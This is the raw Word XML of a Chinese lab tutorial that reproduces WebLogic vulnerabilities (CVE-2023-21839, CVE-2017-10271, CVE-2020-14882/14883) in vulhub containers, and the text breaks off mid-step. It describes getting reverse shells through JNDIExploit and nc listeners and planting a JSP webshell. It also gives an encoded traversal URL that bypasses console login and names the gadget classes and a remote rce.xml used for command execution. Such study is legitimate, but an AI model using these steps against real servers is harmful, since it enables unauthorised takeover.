          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>14.1.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF09B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漏洞复现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用vulhub提供的容器复现，借助专门检测此漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>工具在kail进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4F39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1、创建检测程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2E67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2、借助JNDIExploit工具来利用此RCE漏洞反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F420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3、使用JNDIExploit-1.2-SNAPSHOT.jar在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>上设置监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04161E75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Fonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4、还是在此虚拟机，再打开一个终端开启监听端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B1C4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5、使用CVE-2023-21839工具来进行攻击测试：将1389端口转发到监听端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98F5A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6、若发现JNDIExploit转发监听的窗口报错原因：是JDK版本的问题，需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jdk1.8.0.202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73161A4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7、安装最新java运行环境，重新运行JNDIExploit转发监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA2E1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8、反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C71992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color w:val="808080" w:themeColor="background1" w:themeShade="8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color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.5 XMLDecoder反序列化漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2017-10271）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CE17D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 xml:space="preserve">漏洞原理 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED33E05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Weblogic的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WLS Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>组件对外提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>webservice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务，其中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF15D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解析用户传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5B2A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击者发送精心构造的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据甚至能通过反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拿到权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3402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影响版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10.3.6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.1.3.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B51EF4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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶场来复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154D34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反弹shell演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A20E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1、访问网站：然后访问这个页面抓包，改包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C72F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修改数据包如下：</w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://vulhub.org/#/environments/weblogic/CVE-2017-10271/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23A43B8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2、用另一个主机开启nc监听，用于接受反弹回来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CD8A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3、发送数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F548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4、反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039C5BC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还可以直接植入webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2363943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1、修改数据包：在指定位置写入jsp木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39D06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2、访问写入代码的网址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.1.9:7001/bea_wls_internal/test.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AFDEC9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3、写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B4F61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 xml:space="preserve">漏洞原理 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0F7E1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CVE-2020-14882和CVE-2020-14883是两个安全漏洞。CVE-2020-14882 可以让未授权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2630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的用户绕过管理控制台权限验证，访问后台系统。而CVE-2020-14883则允许后台任意用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EF4A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通过HTTP协议执行任意命令。利用这两个漏洞组合成的利用链，攻击者仅通过一个GET请</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC084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求，就能在远程Weblogic服务器上以未授权的任意用户身份执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936575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影响版本：WebLogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10.3.6.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.1.3.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>14.1.1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0C23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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7F1F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1、先测试权限绕过漏洞(CVE-2020-14882)，访问如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可未授权访问管理后台：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39F10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hyperlink r:id="rId126" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>:7001/console/css/%252e%252e%252fconsole.portal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BE0C67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访问失败就清空缓存多访问几次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B18DA" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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访问后台后，我们发现是低权限用户，无法直接执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565379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3、此时需要利用第二个漏洞(CVE-2020-14883)，两种利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67117D6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方式1：通过com.tangosol.coherence.mvel2.sh.ShellSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503EBE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方式2：通过com.bea.core.repackaged.springframework.context.support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E95F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FileSystemXmlApplicationCon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C581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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法1：通过执行下面代码创建此文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCFE2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时在对应位置添加指令即可利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>com.tangosol.coherence.mvel2.sh.ShellSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F82E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执行命令：会报错，但是指令会执行成功，这就完成了任意操作系统指令的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E86A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如上方法只能在Weblogic 12.2.1以上版本利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191FA1B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因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10.3.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">com.tangosol.coherence.mvel2.sh.ShellSession </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C7B9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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法2：此类对所有版本有效，最早在CVE-2019-2725被提出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>com.bea.core.repackaged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D547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springframework.context.support.FileSystemXmlApplicationCon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D937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1、首先要构造一个XML文件，并保存在自己创建的服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F5EA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此服务器要求使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以访问到。如：</w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://example.com/rce.xml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="277FE4E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2、在Kali虚拟机上直接启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后在nginx站点根目录下面创建上面的rce.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CFB0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3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>直接访问这个xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件看效果：</w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>/rce.xml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05B84E7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4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后通过URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
